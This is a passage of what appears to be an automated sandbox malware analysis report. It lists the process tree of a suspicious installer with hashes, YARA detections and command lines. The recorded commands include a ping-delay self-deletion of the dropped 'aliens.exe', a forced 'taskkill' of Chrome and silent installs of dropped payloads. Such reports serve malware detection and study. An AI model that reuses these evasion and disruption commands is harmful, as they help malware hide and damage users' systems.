                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Users\user\AppData\Local\Temp\sibEFF5.tmp\0\setup.exe' -s
                                                                                                                                                  Imagebase:0x1210000
                                                                                                                                                  File size:4387715 bytes
                                                                                                                                                  MD5 hash:69C9BA53239D6838D05594D96A36DEA3
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low

                                                                                                                                                  Analysis Process: aliens.exe PID: 2992 Parent PID: 2172

                                                                                                                                                  General

                                                                                                                                                  Start time:08:41:29
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Program Files (x86)\71eza90awf48\aliens.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Program Files (x86)\71eza90awf48\aliens.exe'
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:506545472 bytes
                                                                                                                                                  MD5 hash:87698F069716708B6743A580B1D0D0CC
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000004.00000002.641295174.00000000046E0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  Reputation:low

                                                                                                                                                  Analysis Process: msiexec.exe PID: 1752 Parent PID: 2992

                                                                                                                                                  General

                                                                                                                                                  Start time:08:41:52
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
                                                                                                                                                  Imagebase:0x1180000
                                                                                                                                                  File size:59904 bytes
                                                                                                                                                  MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Analysis Process: msiexec.exe PID: 772 Parent PID: 1564

                                                                                                                                                  General

                                                                                                                                                  Start time:08:41:54
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 57A4014B45800FBE12583F3FC91E5DB8 C
                                                                                                                                                  Imagebase:0x1180000
                                                                                                                                                  File size:59904 bytes
                                                                                                                                                  MD5 hash:12C17B5A5C2A7B97342C362CA467E9A2
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Analysis Process: 1E1C360C582DF797.exe PID: 6300 Parent PID: 2992

                                                                                                                                                  General

                                                                                                                                                  Start time:08:42:43
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 0011 installp3
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:506545472 bytes
                                                                                                                                                  MD5 hash:87698F069716708B6743A580B1D0D0CC
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: 00000015.00000002.831664649.00000000050E9000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000015.00000002.829571542.00000000046C0000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  Antivirus matches:
                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                  Reputation:low

                                                                                                                                                  Analysis Process: 1E1C360C582DF797.exe PID: 3180 Parent PID: 2992

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:27
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\1E1C360C582DF797.exe 200 installp3
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:506545472 bytes
                                                                                                                                                  MD5 hash:87698F069716708B6743A580B1D0D0CC
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Yara matches:
                                                                                                                                                  • Rule: Ping_Command_in_EXE, Description: Detects an suspicious ping command execution in an executable, Source: 00000019.00000002.654114181.0000000004750000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                                  Reputation:low

                                                                                                                                                  Analysis Process: 1607186572092.exe PID: 2116 Parent PID: 6300

                                                                                                                                                  General

                                                                                                                                                  Start time:08:42:52
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\1607186572092.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Users\user\AppData\Roaming\1607186572092.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186572092.txt'
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:103632 bytes
                                                                                                                                                  MD5 hash:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low

                                                                                                                                                  Analysis Process: 1607186588295.exe PID: 6636 Parent PID: 6300

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:08
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Users\user\AppData\Roaming\1607186588295.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:'C:\Users\user\AppData\Roaming\1607186588295.exe' /sjson 'C:\Users\user\AppData\Roaming\1607186588295.txt'
                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                  File size:103632 bytes
                                                                                                                                                  MD5 hash:EF6F72358CB02551CAEBE720FBC55F95
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low

                                                                                                                                                  Analysis Process: cmd.exe PID: 5728 Parent PID: 2992

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:32
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:cmd /c ping 127.0.0.1 -n 3 & del 'C:\Program Files (x86)\71eza90awf48\aliens.exe'
                                                                                                                                                  Imagebase:0xbd0000
                                                                                                                                                  File size:232960 bytes
                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Analysis Process: conhost.exe PID: 5724 Parent PID: 5728

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:32
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff6b2800000
                                                                                                                                                  File size:625664 bytes
                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Analysis Process: PING.EXE PID: 4948 Parent PID: 5728

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:32
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:ping 127.0.0.1 -n 3
                                                                                                                                                  Imagebase:0xb80000
                                                                                                                                                  File size:18944 bytes
                                                                                                                                                  MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:moderate

                                                                                                                                                  Analysis Process: ThunderFW.exe PID: 7040 Parent PID: 6300

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:35
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
                                                                                                                                                  Imagebase:0xbd0000
                                                                                                                                                  File size:73160 bytes
                                                                                                                                                  MD5 hash:F0372FF8A6148498B19E04203DBB9E69
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:low

                                                                                                                                                  Analysis Process: cmd.exe PID: 2416 Parent PID: 3180

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:37
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                  Commandline:cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                  Imagebase:0xbd0000
                                                                                                                                                  File size:232960 bytes
                                                                                                                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Analysis Process: conhost.exe PID: 5364 Parent PID: 2416

                                                                                                                                                  General

                                                                                                                                                  Start time:08:43:38
                                                                                                                                                  Start date:05/12/2020
                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                  Imagebase:0x7ff6b2800000
                                                                                                                                                  File size:625664 bytes
                                                                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                  Reputation:high

                                                                                                                                                  Disassembly

                                                                                                                                                  Code Analysis

                                                                                                                                                  Reset < >